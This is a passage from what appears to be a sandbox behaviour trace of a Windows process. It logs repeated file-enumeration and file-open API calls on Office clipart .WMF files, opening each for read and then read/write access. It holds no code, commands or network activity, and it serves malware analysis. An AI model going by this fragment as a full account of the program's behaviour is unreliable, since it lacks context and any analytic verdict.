ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2040)) returned 1 [0103.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.889] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x73bc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00234_.WMF", cAlternateFileName="")) returned 1 [0103.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.889] AreFileApisANSI () returned 1 [0103.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.890] AreFileApisANSI () returned 1 [0103.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.890] GetFileType (hFile=0x368) returned 0x1 [0103.890] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.891] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.891] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.891] CloseHandle (hObject=0x368) returned 1 [0103.891] AreFileApisANSI () returned 1 [0103.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.891] GetFileType (hFile=0x368) returned 0x1 [0103.891] CloseHandle (hObject=0x368) returned 1 [0103.891] AreFileApisANSI () returned 1 [0103.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.892] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x73bc)) returned 1 [0103.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.892] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa82, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00255_.WMF", cAlternateFileName="")) returned 1 [0103.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.892] AreFileApisANSI () returned 1 [0103.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.892] AreFileApisANSI () returned 1 [0103.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.892] GetFileType (hFile=0x368) returned 0x1 [0103.892] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.893] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.893] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.893] CloseHandle (hObject=0x368) returned 1 [0103.893] AreFileApisANSI () returned 1 [0103.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.893] GetFileType (hFile=0x368) returned 0x1 [0103.893] CloseHandle (hObject=0x368) returned 1 [0103.893] AreFileApisANSI () returned 1 [0103.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.893] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa82)) returned 1 [0103.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.894] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd744774, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb10, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00256_.WMF", cAlternateFileName="")) returned 1 [0103.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.894] AreFileApisANSI () returned 1 [0103.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.894] AreFileApisANSI () returned 1 [0103.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.894] GetFileType (hFile=0x368) returned 0x1 [0103.894] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.894] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.895] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.895] CloseHandle (hObject=0x368) returned 1 [0103.895] AreFileApisANSI () returned 1 [0103.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.895] GetFileType (hFile=0x368) returned 0x1 [0103.895] CloseHandle (hObject=0x368) returned 1 [0103.895] AreFileApisANSI () returned 1 [0103.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.895] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd744774, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb10)) returned 1 [0103.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.895] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9456, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00261_.WMF", cAlternateFileName="")) returned 1 [0103.895] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.896] AreFileApisANSI () returned 1 [0103.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.896] AreFileApisANSI () returned 1 [0103.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.896] GetFileType (hFile=0x368) returned 0x1 [0103.896] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.896] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.896] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.897] CloseHandle (hObject=0x368) returned 1 [0103.897] AreFileApisANSI () returned 1 [0103.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.897] GetFileType (hFile=0x368) returned 0x1 [0103.897] CloseHandle (hObject=0x368) returned 1 [0103.897] AreFileApisANSI () returned 1 [0103.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.897] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9456)) returned 1 [0103.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.897] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c5e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00297_.WMF", cAlternateFileName="")) returned 1 [0103.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.897] AreFileApisANSI () returned 1 [0103.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.898] AreFileApisANSI () returned 1 [0103.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.898] GetFileType (hFile=0x368) returned 0x1 [0103.898] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.898] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.898] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.898] CloseHandle (hObject=0x368) returned 1 [0103.898] AreFileApisANSI () returned 1 [0103.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.899] GetFileType (hFile=0x368) returned 0x1 [0103.899] CloseHandle (hObject=0x368) returned 1 [0103.899] AreFileApisANSI () returned 1 [0103.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.899] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c5e)) returned 1 